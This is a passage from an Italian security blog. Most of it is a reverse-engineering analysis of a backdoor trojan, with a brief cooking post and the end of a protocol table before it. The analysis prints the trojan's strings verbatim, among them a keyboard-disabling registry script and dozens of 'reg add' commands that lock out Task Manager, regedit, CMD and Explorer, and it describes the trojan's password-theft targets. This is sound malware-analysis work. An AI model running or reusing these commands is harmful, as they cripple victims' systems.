bgcolor="#eecc11">70%</td> <td>—</td> </tr> <tr align="center"> <td>FTP</td> <td bgcolor="green">90%</td> <td>—</td> </tr> <tr align="center"> <td>IPP</td> <td bgcolor="green">90%</td> <td>—</td> </tr> <tr align="center"> <td>PJL</td> <td bgcolor="green">90%</td> <td>—</td> </tr> <tr align="center"> <td>NNTP</td> <td bgcolor="red">30%</td> <td>—</td> </tr> <tr align="center"> <td>MSN</td> <td bgcolor="red">10%</td> <td>—</td> </tr> <tr align="center"> <td>IRC</td> <td bgcolor="red">15%</td> <td>—</td> </tr> <tr align="center"> <td>YAHOO</td> <td bgcolor="red">0%</td> <td>—</td> </tr> <tr align="center"> <td>GTALK</td> <td bgcolor="red">0%</td> <td>—</td> </tr> <tr align="center"> <td>EMULE</td> <td bgcolor="red">0%</td> <td>—</td> </tr> <tr align="center"> <td>SSL/TLS</td> <td bgcolor="red">0%</td> <td>with keys</td> </tr> <tr align="center"> <td>IPsec</td> <td bgcolor="red">0%</td> <td>with keys</td> </tr> <tr align="center"> <td>802.11</td> <td bgcolor="red">0%</td> <td>with keys</td> </tr> <tr align="center"> <td>MMSE</td> <td bgcolor="green">95%</td> <td>over HTTP</td> </tr> <tr align="center"> <td>Linux cooked</td> <td bgcolor="green">95%</td> <td>SLL</td> </tr> <tr align="center"> <td>TFTP</td> <td bgcolor="green">90%</td> <td>—</td></tr></tbody></table></th></tr></tbody></table><br />I want say thanks to <a href="http://www.xplico.org/">Xplico Team</a> for this great software :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4683300908595884505?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-15570140437236410242009-10-04T11:59:00.000-07:002009-10-04T12:26:21.388-07:00ssi non mi occupo solo di ICT Security, Reverse Engineering, Pen Testing, Exploiting, Packaging, Coding, System Administration...<br />Ogni tanto cucino anche !<br />Per darvi prova del fatto che cucino eccovi le ultime foto fatte XD<br />Si di solito cucino in mutande e allora ?!?<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjxnqejCTI/AAAAAAAAARs/wuYMmXRv-VM/s1600-h/IMG_3450.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjxnqejCTI/AAAAAAAAARs/wuYMmXRv-VM/s200/IMG_3450.JPG" alt="" id="BLOGGER_PHOTO_ID_5388822617868405042" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br />Mentre assaggio quello che ho fatto... mmm buono !!!<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjyWXGcf-I/AAAAAAAAAR0/_F1xyAi1GQc/s1600-h/IMG_3451.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjyWXGcf-I/AAAAAAAAAR0/_F1xyAi1GQc/s200/IMG_3451.JPG" alt="" id="BLOGGER_PHOTO_ID_5388823420120891362" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />La mia frittata !! L'ho dovuta rifare 3 volte per farla uscire tutta intera :D<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjyrCC5T9I/AAAAAAAAAR8/qvAtk95v_es/s1600-h/IMG_3484.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjyrCC5T9I/AAAAAAAAAR8/qvAtk95v_es/s200/IMG_3484.JPG" alt="" id="BLOGGER_PHOTO_ID_5388823775246110674" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Il risultato !!!<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjzA2IBqSI/AAAAAAAAASE/ws5dYT_0DkM/s1600-h/IMG_3486.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjzA2IBqSI/AAAAAAAAASE/ws5dYT_0DkM/s200/IMG_3486.JPG" alt="" id="BLOGGER_PHOTO_ID_5388824150003525922" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjzVlSaPxI/AAAAAAAAASM/KA6XGJaovCk/s1600-h/IMG_3487.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjzVlSaPxI/AAAAAAAAASM/KA6XGJaovCk/s200/IMG_3487.JPG" alt="" id="BLOGGER_PHOTO_ID_5388824506260930322" border="0" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1557014043723641024?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-10610836684793876552009-10-04T08:47:00.000-07:002009-10-06T10:30:58.260-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjaxfghdDI/AAAAAAAAAQ8/jrPBfOabXWQ/s1600-h/Screenshot-t3c4i3%27s+Re++++++++++++++++++++++++++++++++.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 230px; height: 125px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjaxfghdDI/AAAAAAAAAQ8/jrPBfOabXWQ/s200/Screenshot-t3c4i3%27s+Re++++++++++++++++++++++++++++++++.png" alt="" id="BLOGGER_PHOTO_ID_5388797497955152946" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjbvWSpDrI/AAAAAAAAARE/S980YyrNjMs/s1600-h/prova.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 156px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjbvWSpDrI/AAAAAAAAARE/S980YyrNjMs/s200/prova.jpg" alt="" id="BLOGGER_PHOTO_ID_5388798560632901298" border="0" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjbwJT4gtI/AAAAAAAAARU/iI2FzaEo5cM/s1600-h/prova.sec02..rdata.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 156px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsjbwJT4gtI/AAAAAAAAARU/iI2FzaEo5cM/s200/prova.sec02..rdata.jpg" alt="" id="BLOGGER_PHOTO_ID_5388798574328316626" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjbvssDirI/AAAAAAAAARM/zf8XVjOY_0k/s1600-h/prova.sec01..text.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 156px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SsjbvssDirI/AAAAAAAAARM/zf8XVjOY_0k/s200/prova.sec01..text.jpg" alt="" id="BLOGGER_PHOTO_ID_5388798566645074610" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjbwTYpcoI/AAAAAAAAARc/Jv_xRKOREpo/s1600-h/prova.sec03..data.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 156px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsjbwTYpcoI/AAAAAAAAARc/Jv_xRKOREpo/s200/prova.sec03..data.jpg" alt="" id="BLOGGER_PHOTO_ID_5388798577032655490" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Ciao a tutti,<br />in questi giorni mi sono smazzata tra ida pro per debian/gnulinux -- ollydebug su wine una marea di manuali di unpacking e 5 gb di virus... alla fine ho comuqnue preferito scrivere di nuovi trojan usciti da poco.<br /><br />Bene questo viene trovato solo da <table class="tbl" cellpadding="5" cellspacing="0"><tbody><tr><td class="cell_1">[file and pathname of the sample #1] </td> <td class="cell_1">69,704 bytes</td> <td class="cell_1">MD5: 0xB9DF7508F42E7283F5E3A4FFB96B9B9C<br />SHA-1: 0x979385C4690F8F77A619CEB1A547F5817E19A919</td> <td class="cell_2">Backdoor.Win32.Agent.alke [Kaspersky Lab]</td></tr></tbody></table><br />si kaspersky è uscito da poco ed è abbastanza interessante magari non è hai livelli di Zeus (tra un pò arriverò anche ad analizzare in dettaglio quello ho gia cominciato qualcosa) ma è pur sempre fatto bene e molto old school.<br />è fatto in c++ il che è una rarità per molti nuovi virus che sono sempre più sviluppati con Delphi.<br />il programma usa queste funzioni:<br />Program:<br /><program><br />GetLastActivePopup<br />GetActiveWindow<br />MessageBoxA<br />user32.dll</program><br /><program>1#QNAN<br />1#INF<br />1#IND<br />1#SNAN<br />GetCurrentDirectoryA<br />GetEnvironmentVariableA<br />DeleteFileA<br />CreateThread<br />Sleep</program><br /><program>GetTempPathA<br />GetSystemDirectoryA<br />GetComputerNameA<br />GetModuleFileNameA<br />GlobalFree<br />CloseHandle<br />WriteFile<br />CreateFileA<br />GlobalAlloc<br />LocalAlloc<br />SetFileAttributesA<br />GetWindowsDirectoryA<br />ReadFile</program><br /><program>SetFilePointer<br />GetVersionExA<br />SetCurrentDirectoryA<br />GetFileAttributesA<br />LoadLibraryA<br />GetProcAddress<br />FreeLibrary<br />GetCurrentProcess<br />GetTickCount<br />KERNEL32.dll<br />FindWindowA<br />USER32.dll<br />BitBlt<br />SelectOb</program><program>ject<br />CreateCompatibleBitmap<br />GetDeviceCaps<br />CreateCompatibleDC<br />CreateDCA<br />GetDIBits<br />GetObjectA<br />GDI32.dll<br />GetUserNameA<br />RegCloseKey<br />RegQueryValueExA<br />RegOpenKeyExA<br />RegSet</program><program>ValueExA<br />RegOpenKeyA<br />OpenProcessToken<br />ADVAPI32.dll<br />ShellExecuteA<br />SHELL32.dll<br />InternetOpenUrlA<br />InternetCloseHandle<br />InternetOpenA<br />WININET.dll<br />WS2_32.dll<br />GetLastError<br />SetEnvironmentVariableA<br />HeapFree<br />HeapAlloc<br />GetTimeZoneInformation<br />GetSystemT</program><program>ime<br />GetLocalTime<br />MoveFileA<br />ExitProcess<br />TerminateProcess<br />GetModuleHandleA<br />GetStartupInfoA<br />GetCommandLineA<br />GetVersion<br />HeapDestroy<br />HeapCrea</program><program>te<br />VirtualFree<br />VirtualAlloc<br />HeapReAlloc<br />GetCPInfo<br />GetACP<br />GetOEMCP<br />WideCharToMultiByte<br />SetHandleCount<br />GetStdHandle<br />GetFileType<br />UnhandledExceptionFilter<br />FreeEnvironmentStringsA<br />FreeEnvironmentStringsW<br />GetEnvironmentStrings<br />GetEnviron</program><program>mentStringsW<br />RtlUnwind<br />MultiByteToWideChar<br />GetStringTypeA<br />GetStringTypeW<br />LCMapStringA<br />LCMapStringW<br />SetStdHandle<br />FlushFileBuffer</program><program>s<br />SetEndOfFile<br />CompareStringA<br />CompareStringW<br /><br /><br />Fa una lista delle directory e ritorna le funzioni utilizzabili.<br />Ad esempio può fare casino nel computer vittima (prank) o mostrare le informazioni dello schermo "display/information" e desktop (che manda una jpg con la schermata della vittima)<br />Fornisce una shell di dos<br />Cerca le password salvandole in un file e mandandole all attaccante<br />Ha una funzi</program><program>one di keylog (utilizzabile solo nella versione privata hihi)<br />Clear per cancellare i log<br />Download per scaricare file dal computer e upload per caricarli<br />Driver query per la lista dei driver<br />e questi ultimi che si spiegano da soli<br />ipconfig<br />path<br />tasklist<br />start<br />mkdir<br />taskkill<br />shutdown</program><br /><program>attrib<br />rename<br />assoc<br />chdir<br />title<br />color<br /><br />Chiede la versione del sistema su cui sta il server remoto<br /><br />@.q0o2nc<br />}c9c$F&amp;+O$`"<br />_ERROR_1_</program><br /><program>::System Information<br />OS - Windows XP<br />OS - Windows Vista<br /><br />Scarica i keylog nel file \TFR336F.tmp<br /><br />fa un bypass al Windows Security Alert<br />DFAFD.bat<br />\cmd.exe<br />Windows Security Alert<br />/c taskkill /im rundll32.exe /f<br />open<br />taskkill /im rundll32.exe /f<br />open<br /></program><br /><program><br />usa varie dll e funzioni<br />mozcrt19.dll<br />nspr4.dll<br />plds4.dll<br />plc4.dll<br />nssutil3.dll<br />sqlite3.dll<br />nspr4.dll<br />plds4.dll</program><br /><program>plc4.dll<br />plc4.dll<br />softokn3.dll<br />nss3.dll<br />nss3.dll<br />plc4.dll<br />NSS_Init<br />NSS_Shutdown<br />PK11_GetInternalKeySlot<br />PK11_FreeSlot<br />PK11_Authenticate<br />PK11SDR_Decrypt<br />PK11_CheckUserPassword<br />PL_Base64Decode<br /><br /></program><br /><program>cerca di scaricare password da firefox e windows live<br />--------------------------------------------------------------------------------<br />Application Type - FireFox<br />Signon: %s<br />::--Unmanaged Urls<br />::--Managed Urls<br />URL: %s<br />%s : %s<br />End of Signo</program><program>n: %s<br />SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command<br />Application Data\Mozilla\Firefox<br />userprofile<br />\Application Data\Mozilla\Firefox<br />\profiles.ini<br />\AppData\Roaming\Mozilla\Firefox<br />\profiles.ini<br />name=default<br />path=<br />SOFTWARE\Mozilla\Mozilla Firefox<br />CurrentVersion<br />signons.txt<br />signons2</program><program>.txt<br />signons3.txt<br />End of FireFox<br />advapi32.dll<br />CredEnumerateA<br />CredFree<br />WindowsLive:name=*<br />\TFR336F.tmp<br />--------------------------------------------------------------------------------<br />Application Type - Windows Live Messenger version 8.x/9.x:<br />Username: %s<br />Password: %</program><program>ws<br />End Of Windows Live Messenger<br />\TFR336F.tmp<br />_ERROR_1_<br />_ERROR_2_<br />_ERROR_3_<br />\TFR336F.exe<br />\TFR336F.bat<br />_ERROR_1_<br />_ERROR_2_<br />_ERROR_1_</program><br /><program>_ERROR_2_<br /><br />C'è una signature<br /><br />----------Signature----------<br /><br />Armadillo v1.71<br /><br /></program>Quindi l hanno criptato con armadillo<br /><program><br />facendo vari unpacking e vari dump sono riuscita a decryptare l ip della connessione </program><program>e l id che avevo messo<br /><br />00011000 : 31 32 37 2E 30 2E 30 2E 31 00 00 00 00 00 00 00 127.0.0.1.......<br />00011010 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />00011020 : C0 07 00 00 61 73 64 65 72 00 00 00 00 00 00 00 À..ASDER.......<br /><br />visto che la connessione l avevo messa io puntava in locale ;)<br /><br /><br /><br /></program><br /><program><br />00401015 PUSH t3c4i3's.00410034 Custom commands\n\n<br />00401022 PUSH t3c4i3's.00410048 1 - download "filename"\n<br />0040102F PUSH t3c4i3's.00410064 2 - upload [/server | /url] "filename" "url"\n<br />0040103C PUSH t3c4i3's.00410094 3 - keylog [/on] [/off] [/get] [/clear]\n<br />00401049 PUSH t3c4i3's.004100C0 4 - click "website" count\n<br />00401056 PUSH t3c4i3's.004100DC 5 - password [/get]\n<br />00401063 PUSH t3c4i3's.004100F4 6 - dos "ip" port [/tcp] sockets packets\n<br />00401070</program><program> PUSH t3c4i3's.00410120 7 - display [/desktop | /information]\n<br />0040107D PUSH t3c4i3's.00410148 8 - del "filename" (modified)\n<br />0040108A PUSH t3c4i3's.00410168 9 - prank [/list | number]\n\n<br />00401097 PUSH t3c4i3's.00410188 Normal Shell commands\n\n<br />004010A4 PUSH t3c4i3's.004101A4 Start, Exit, Cls, Help, Dir, Ipconfig\n<br />004010B1 PUSH t3c4i3's.004101CC Tasklist, Taskkill, Md, Mkdir, Rmdir, Shutdown\n<br />004010BE PUSH t3c4i3's.00410200 Attrib, Ren, Rename, Assoc\n<br />004010CB PUSH t3c4i3's.00410220 ... Etc.\n\n<br />004010D8 PUSH t3c4i3's.0041022C Keylog function has been locked from public version.\n\n<br />004010E5 PUSH t3c4i3's.00410264 keylog<br /></program><br /><program>questa è una funzione che può venire usata per guadagnare dai banner<br /><br />00401D74 PUSH t3c4i3's.00410AB0 CLICK\t\tClicks a website invisibly\n<br /></program><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/Ssjl1q2iAKI/AAAAAAAAARk/4BBRLSmnoQA/s1600-h/95994825.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 100px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/Ssjl1q2iAKI/AAAAAAAAARk/4BBRLSmnoQA/s200/95994825.jpg" alt="" id="BLOGGER_PHOTO_ID_5388809664347635874" border="0" /></a><br /><br /><program><br /><br /><br /><br /><br /><br />004044ED PUSH t3c4i3's.00412550 echo Windows Registry Editor Version 5.00>"nokeyboard.r</program><program>eg"\n<br />004044FE PU</program><program>SH t3c4i3's.0041258C echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout]>>nokeyboard.reg\n<br />0040450F PUSH t3c4i3's.004125E4 echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\>>nokeyboard.reg\n<br />00404520 PUSH t3c4i3's.00412644 echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\>>nokeyboard.reg\n<br />0040453</program><program>1 PUSH t3c4i3's.004126A8 echo 41,00,00,00,42,00,00</program><program>,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\>>nokeyboard.reg\n<br />00404542 PUSH t3c4i3's.0041270C echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\>>nokeyboard.reg\n<br />00404553 PUSH t3c4i3's.00412770 echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\>>nokeyboard.reg\n<br />00404564 </program><program>PUSH t3c4i3's.004127D4 echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\>>nokeyboard.reg\n<br />00404575 PUSH t3c4i3's.00412838 echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\>>nokeyboard.reg\n<br />00404586 PUSH t</program><program>3c4i3's.0041289C echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\>>nokeyboard.reg\n<br />00404597 PUSH t3c4i3's.00412900 echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\>>nokeyboard.reg\n<br />004045A8 PUSH t3c4i3's.00412964 echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\>>nokeyboard.reg\n<br />004045B9 PUSH t3c4i3's.004129C8 echo 10,00,00,00</program><program>,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\>>nokeyboard.reg\n<br />004045CA PUSH t3c4i3's.00412A2C echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\>>nokeyboard.reg\n<br />004045DB PU</program><program>SH t3c4i3's.00412A90 echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\>>nokeyboard.reg\n<br />004045EC PUSH t3c4i3's.00412AF4 echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\>>nokeyboard.reg\n<br />004045FD PU</program><program>SH t3c4i3's.00412B58 echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\>>nokeyboard.reg\n<br />0040460E PUSH t3c4i3's.00412BBC echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\>>nokeyboard.reg\n<br />0040461F PUSH t3c</program><program>4i3's.00412C20 echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\>>nokeyboard.reg\n<br />00404630 PU</program><program>SH t3c4i3's.00412C84 echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\>>nokeyboard.reg\n<br />00404641 PUSH t3c4i3's.00412CE8 echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\>>nokeyboard.reg\n<br />00404652 PUSH t3c4i3's.00412D4C echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\>>nokeyboard.reg\n<br />00404663 PUSH t3c4i3's.00412DB0 echo 00,00,66,e0,00,00</program><program>,6b,e0,00,00,21,e0,00,00,00,00>>nokeyboard.reg\n<br />00404674 PUSH t3c4i3's.00412DF8 start /min nokeyboard.reg\n<br />00404685 PUS</program><program>H t3c4i3's.00412E14 ping 127.0.0.1 /w 3000>nul\n<br /></program><br /><program>parte che usa per fare keylogging<br /><br /><br />004046AC PUSH t3c4i3's.00412E48 reg add HKLM\System\CurrentControlSet\Services\MouClass /v Start /t reg_dword /d 4 /f\n<br /><br />Abilita l ultilizzo dei driver del mouse di sistema<br /><br />004046C2 PUSH t3c4i3's.00412EA0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\</program><program>P</program><program>olicies\System /v DisableTaskMgr /t reg_dword /d 1 /f\n<br /><br />Cerca di disabilitare il task manager<br /><br />004046D8 PUSH t3c4i3's.00412F10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t reg_dword /d 1 /f\n<br /><br />Anche il R</program><program>egedit<br /><br />004046EE PUS</program><program>H t3c4i3's.00412F88 reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t reg_dword /d 1 /f\n<br /><br />Disabilita il promt comandi<br /><br />Impedisce il funzionamento a tutti questi file<br />00404704 PUSH t3c4i3's.00412FE4 reg add "HKCU\control panel\don't load" /v access.cpl /d no /f\n<br />00404715 PUSH t3c4i3's.00413024 reg add "HKCU\control panel\don't load" /v appwiz.c</program><program>pl /d</program><program> no /f\n<br />00404726 PUSH t3c4i3's.00413064 reg add "HKCU\control panel\don't load" /v console.cpl /d no /f\n<br />00404737 PUSH t3c4i3's.004130A8 reg add "HKCU\control panel\don't load" /v timedate.cpl /d no /f\n<br />00404748 PUSH t3c4i3's.004130EC reg add "HKCU\control panel\don't load" /v desk.cpl /d no /f\n<br />00404759 PUSH t3c4i3's.0041312C reg add "HKCU\control panel\don't load" /v fax.cpl /d </program><program>no /f\n</program><br /><program>0040476A PUSH t3c4i3's.0041316C reg add "HKCU\control panel\don't load" /v hdwwiz.cpl /d no /f\n<br />0040477B PUSH t3c4i3's.004131AC reg add "HKCU\control panel\don't load" /v irprops.cpl /d no /f\n<br />0040478C PUSH t3c4i3's.004131F0 reg add "HKCU\control panel\don't load" /v intl.cpl /d no /f\n<br />0040479D PUSH t3c4i3's.00413230 reg add "HKCU\control panel\don't load" /v inetcpl.cpl /d no /f\n<br />004047AE PUSH t3c4i3's.00413274 reg add "HKCU\control panel\don't load" /v joy.cpl /d no </program><program>/f\n</program><br /><program>004047BF PUSH t3c4i3's.004132B4 reg add "HKCU\control panel\don't load" /v liccpa.cpl /d no /f\n<br />004047D0 PUSH t3c4i3's.004132F4 reg add "HKCU\control panel\don't load" /v main.cpl /d no /f\n<br />004047E1 PUSH t3c4i3's.00413334 reg add "HKCU\control panel\don't load" /v mlcfg32.cpl /d no /f\n<br />004047F2 PUSH t3c4i3's.00413378 reg add "HKCU\control panel\don't load" /v mmsys.cpl /d</program><program> </program><program>no /f\n<br />00404803 PUSH t3c4i3's.004133B8 reg add "HKCU\control panel\don't load" /v ncpa.cpll /d no /f\n<br />00404814 PUSH t3c4i3's.004133F8 reg add "HKCU\control panel\don't load" /v modem.cpl /d no /f\n<br />00404825 PUSH t3c4i3's.00413438 reg add "HKCU\control panel\don't load" /v netcpl.cpl /d no /f\n<br />00404836 PUSH t3c4i3's.00413478 reg add "HKCU\control panel\don't load" /v nwc.cpl /d no /f\n<br />00404847 PUSH t</program><program>3c4i3's.004134B8 reg add "HKCU\control panel\don't load" /v odbccp32.cpl /d no /f\n<br />00404858 PUSH t3c4i3's.004134FC reg add "HKCU\control panel\don't load" /v devapps.cpl /d</program><program> no /f\n<br />00404869 PUSH t3c4i3's.00413540 reg add "HKCU\control panel\don't load" /v ports.cpl /d no /f\n<br />0040487A PUSH t3c4i3's.00413580 reg add "HKCU\control panel\don't load" /v powercfg.cpl /d no /f\n<br />0040488B PUSH t3c4i3's.004135C4 reg add "HKCU\control panel\don't load" /v sticpl.cpl /d no</program><program> /f\n<br />0040489C PUSH t3c4i3's.00413604 reg add "HKCU\control panel\don't load" /v srvmgr.cpl /d no /f\n<br />004048AD PUSH t3c4i3's.00413644 reg add "HKCU\control panel\don't load" /v sapi.cpl /d no /f\n<br />004048BE PUSH t3c4i3's.00413684 reg add "HKCU\control panel\don't load" /v sysdm.cpl /d no /f\n<br />004048CF PUSH t3c4i3's.004136C4 reg add "HKCU\control panel\don't load" /v telephon.cpl /d no /f\n<br />004048E0 PUSH t3c4i3's.00413708 reg add "HKCU\control panel\don't load" /v tweakui.cpl /d </program><program>no /</program><program>f\n<br />004048F1 PUSH t3c4i3's.0041374C reg add "HKCU\control panel\don't load" /v nusrmgr.cpl /d no /f\n<br />00404902 PUSH t3c4i3's.00413790 reg add "HKCU\control panel\don't load" /v wspcpl32.cpl /d no /f\n<br />00404913 PUSH t3c4i3's.004137D4 reg add "HKCU\control panel\don't load" /v quicktime.cpl /d</program><program> no /f\n<br />00404924 PUSH t3c4i3's.00413818 reg add "HKCU\control panel\don't load" /v S32LUCP1.cpl /d no /f\n<br />00404935 PUSH t3c4i3's.0041385C reg add "HKCU\control panel\don't load" /v cpqmgmt.cpl /d </program><program>no /f\n<br /><br />Disabilita anche gran parte delle funzioni di explorer e windows update<br />0040494B PUSH t3c4i3's.004138A0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion</program><program>\Policies\Explorer /v NoDeletePrinter /t reg_dword /d 1 /f\n<br />0040495C PUSH t3c4i3's.00413914 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoAddPrinter /t reg_dword /d 1 /f\n<br />0040496D PUSH t3c4i3's.00413984 reg add HKCU\Software\Microsoft\Windows\CurrentVe</program><program>rsion\Policies\Explorer /v NoClose /t reg_dword /d 1 /f\n<br />0040497E PUSH t3c4i3's.004139F0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t reg_dword /d 1 /f\n<br />0040498F PUSH t3c4i3's.00413A5C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t reg_dword /d 1 /f\n<br />004049A0 PUSH t3c4i3's.00413AC4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\P</program><program>ol</program><program>icies\Explorer /v NoSetFolders /t reg_dword /d 1 /f\n<br />004049B1 PUSH t3c4i3's.00413B34 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 1 /f\n<br />004049C2 PUSH t3c4i3's.00413BA4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t reg_dword /d 1 /f\n<br />004049D3 PUSH t3c4i3's.00413C10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t reg_dword /d 3FFFFFF /f\n<br />004049E4 </program><program>PUSH t3c4i3's.00413C84 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\P</program><program>olicies\Explorer /v NoNetHood /t reg_dword /d 1 /f\n<br />004049F5 PUSH t3</program><program>c4i3's.00413CF0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSaveSettings /t reg_dword /d 1 /f\n<br />00404A06 PUSH t3c4i3's.00413D64 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableRegistryTools /t reg_dword /d 1 /f\n<br />00404A17 PUSH t3c4i3's.00413DDC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Po</program><program>licies\Explorer /v NoRecentDocsMenu /t reg_dword /d 1 /f\n<br />00404A28 </program><program>PUSH t3c4i3's.00413E50 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsHistory /t reg_dword /d 1 /f\n<br />00404A39 PUSH t3c4i3's.00413EC8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFileMenu /t reg_dword /d 1 /f\n<br />00404A4A PUSH 